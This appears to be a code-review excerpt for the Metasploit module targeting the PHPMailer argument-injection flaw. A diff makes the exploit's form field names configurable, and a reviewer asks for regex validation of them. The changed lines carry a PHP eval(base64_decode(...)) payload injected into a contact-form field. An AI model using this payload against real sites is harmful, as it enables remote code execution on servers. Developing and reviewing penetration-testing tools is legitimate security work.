modules/exploits/multi/http/phpmailer_arg_injection.rb

```diff
@@ -111,9 +117,9 @@ def exploit
 
     data = Rex::MIME::Message.new
     data.add_part('submit', nil, nil, 'form-data; name="action"')
-    data.add_part("<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>", nil, nil, 'form-data; name="name"')
-    data.add_part(email, nil, nil, 'form-data; name="email"')
-    data.add_part("#{rand_text_alphanumeric(2 + rand(20))}", nil, nil, 'form-data; name="message"')
+    data.add_part("<?php eval(base64_decode('#{Rex::Text.encode_base64(payload.encoded)}')); ?>", nil, nil, "form-data; name='#{name_field}'")
+    data.add_part(email, nil, nil, "form-data; name='#{email_field}'")
+    data.add_part("#{rand_text_alphanumeric(2 + rand(20))}", nil, nil, "form-data; name='#{message_field}'")
```

Comment:
changed form-data variable names  from static to advanced options allowing for more flexability

Reply:
This makes it look like the values should either be escaped or validated to ensure they only consist of acceptable characters. One way to limit it to an acceptable set of characters could be to use the `regex:` keyword argument in the option definition. There's an example of that usage in [this exploit](https://github.com/rapid7/metasploit-framework/blob/1a2285e1b3a3952280e863aa6ecd666d87fb3086/modules/exploits/linux/local/sudo_baron_samedit.rb#L89).